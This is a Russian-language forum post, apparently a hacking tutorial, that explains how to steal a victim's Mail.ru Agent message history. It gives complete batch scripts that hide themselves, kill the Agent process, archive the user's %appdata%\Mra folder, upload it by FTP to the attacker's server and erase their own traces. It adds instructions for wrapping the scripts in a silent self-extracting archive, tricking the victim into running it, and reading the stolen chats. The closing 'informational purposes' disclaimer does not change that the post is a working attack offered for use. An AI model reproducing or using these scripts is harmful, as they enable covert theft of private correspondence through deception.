Для осуществления хака потребуется СИ(социальная инженерия) и сервер. Я использовал бесплатный срев на
http://www.webservis.ru
Будем заливать переписку из "Mail.ru Агента" на сервер, при помощи bat файлов(Win XP) и двух утилит.
Нам понадобится утилиты "Rar.exe" и "offsee.exe"(hidec)
Скачать утилиту для архивации "Rar.exe"
Скачать утилиту для скрытия cmd "offsee.exe"
Первый бат-файл я назвал «start» его содержание:
code:
@echo off
offsee.exe "bod.bat"
exit
он запускает второй батник через утилиту “hidec” с названием «offsee.exe» которая скроет консольное окно.
Второй бат-файл я назвал «bod» его содержание:
Спойлер
@echo off
set name=%usernamee%_%date%
attrib +H +S "bod.bat"
attrib +H +S "offsee.exe"
attrib +H +S "Rar.exe"
attrib +H +S "start.bat"
echo open Ваш_сервер >> ftpcmd
attrib +H +S "ftpcmd"
echo USER Логин Пароль >> ftpcmd
echo binary >> ftpcmd
echo quote PASV >> ftpcmd
echo cd public_html >> ftpcmd
echo put "\serv\%name%-Mra.rar" >> ftpcmd
echo disconnect >> ftpcmd
echo close >> ftpcmd
echo bye >> ftpcmd
taskkill /f /t /fi "MODULES eq YLUSBTEL.dll"
md "\serv"
attrib +H +S "\serv"
md "\serv\%name%"
rd /s /q "%appdata%\Mra\Avatars"
xcopy "%appdata%\Mra" "\serv\%name%" /s /c /g /h /r /y /q
Rar A -r -ep1 -df -m4 "\serv\%name%-Mra.rar" "\serv\%name%"
ftp -s:ftpcmd -n -v
rd /s /q "\serv"
attrib -H -S "ftpcmd"
del /f /q "ftpcmd"
attrib -H -S "Rar.exe"
del /f /q "Rar.exe"
attrib -H -S "start.bat"
del /f /q start.bat
attrib -H -S "offsee.exe"
del /f /q offsee.exe
del /f /q start.exe
attrib -H -S "bod.bat"
del /f /q %0
exit
Он завершит процесс Агента, скопирует, заархивирует переписку в rar, переименует в ИмяПользователя_Дата-Mra.rar и зальёт архив на ваш сервер.
Ключевые моменты: вместо «Ваш_сервер» нужно ввести адрес вашего серва. «Логин» «Пароль», соответственно то-же ваш логин и пароль. В строке
del /f /q start.exe
«start.exe» заменить на название фала само-распаковки(SFX-архив).
Лучше, конечно, все 4 файла залить в SFX-архив, с параметрами:
"Путь распаковки" - Создать в текущей папке
"Программа установки, Выполнить после установки" - start.bat
"Режим вывода информации" - Скрыть всё
Получившиеся приложение, само-собой, нужно дать жертве, что-бы она его открыла.
Украли, как прочитать? Тут два варианта:
1)В архиве, открыть файл находящийся в Mra\Base\mra.dbs с помощью программы "magent-hr3.0" Программа читает первые 1500 сообщений, а дальше нет.
Скачать "magent-hr3.0"
"Сайт" программы
2.1 Отключиться от интернета, установить М-Агент на комп, в папке "Mra"(%appdata%\Mra или Application Data\Mra) заменить все файлы и папки на файлы и папки из нашего архива.
2.2 Запустить М-Агент, ввести е-маил жертвы, ввести любой пароль и нажать "Сохранить пароль", далее можно смотреть полную переписку с кем угодно.
PS Естественно все это работает когда у жертвы WinXp и переписка не удалена самой жертвой.
PPS Будут вопросы, предложения, ошибки по моему "приложению" - пишите тут.
PPPS Всё в ознакомительных целях, автор ответственности не несёт.